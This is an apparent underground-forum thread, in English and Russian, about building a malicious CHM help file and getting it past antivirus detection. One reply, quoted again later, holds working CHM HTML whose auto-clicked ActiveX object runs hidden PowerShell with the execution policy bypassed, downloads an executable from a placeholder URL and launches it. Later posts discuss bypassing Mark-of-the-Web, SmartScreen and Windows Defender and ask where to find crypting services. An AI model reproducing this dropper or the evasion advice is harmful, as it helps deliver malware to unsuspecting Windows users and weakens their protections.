Malicious CHM File

wiseguy01 · 07.02.2023

Hello,

I have made a malicious chm file, I obfuscated the HTML page and used calc.exe to test but still 6/60 on VT detect.
Any ideas how to fix?

Thanks,
WG01

wiseguy01 · 10.02.2023

using powershell line to run from CMD inside CHM and then load a batch file and runs it.

xrahitel · 06.07.2023

wiseguy01 сказал(а):

using powershell line to run from CMD inside CHM and then load a batch file and runs it.

Потому что твой код убитый на глухо, типа этого

Код:

<html>

<head>
</head>
<body>
<object id=x classid="clsid:C4D2D8E0-D1DD-11CE-940F-008029004347" width=4 height=4>
<param name="Command" value="ShortCut">
<param name="Button" value="Bitmap::shortcut">
<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('URLTOFILE','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;">
<param name="Item2" value="273,1,1">
</object>
<script>
x.Click();
</script>

</body>
</html>

Просто используй другие варианты тыц как пример с SMB бегом сюда тыц или тыц

mvjdasf3 · 11.07.2023

xrahitel сказал(а):
Потому что твой код убитый на глухо, типа этого Посмотреть вложение 60335
Код:
<html>

<head>
</head>
<body>
<object id=x classid="clsid:C4D2D8E0-D1DD-11CE-940F-008029004347" width=4 height=4>
<param name="Command" value="ShortCut">
<param name="Button" value="Bitmap::shortcut">
<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('URLTOFILE','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;">
<param name="Item2" value="273,1,1">
</object>
<script>
x.Click();
</script>

</body>
</html>
Просто используй другие варианты тыц как пример с SMB бегом сюда тыц или тыц

Ты на какой винде тестиш? ХР? На новых все файлы скачанные из интернета улетают в блок и на сканирование автоматом из за того что подписи нет. Держу в курсе.

xrahitel · 11.07.2023

mvjdasf3 сказал(а):

Ты на какой винде тестиш? ХР?

8.1 с последними обновами.

mvjdasf3 сказал(а):

На новых все файлы скачанные из интернета улетают в блок.

Может просто MOTW надо обходить, ставлю в курс

hustleTraffic · 29.07.2023

У вас есть обучение по нему?

pierre777reborn · 25.11.2023

xrahitel сказал(а):

8.1 с последними обновами.

Может просто MOTW надо обходить, ставлю в курс Посмотреть вложение 60609

hi, I watched a lot of your videos on Youtube
However I couldn't find any crypting (smartscreen+WD bypass)

Do you have any reliable source?
Thanks

Malicious CHM File

wiseguy01

ripper

wiseguy01

ripper

xrahitel

(L1) cache

mvjdasf3

floppy-диск

xrahitel

(L1) cache

hustleTraffic

RAM

pierre777reborn

(L3) cache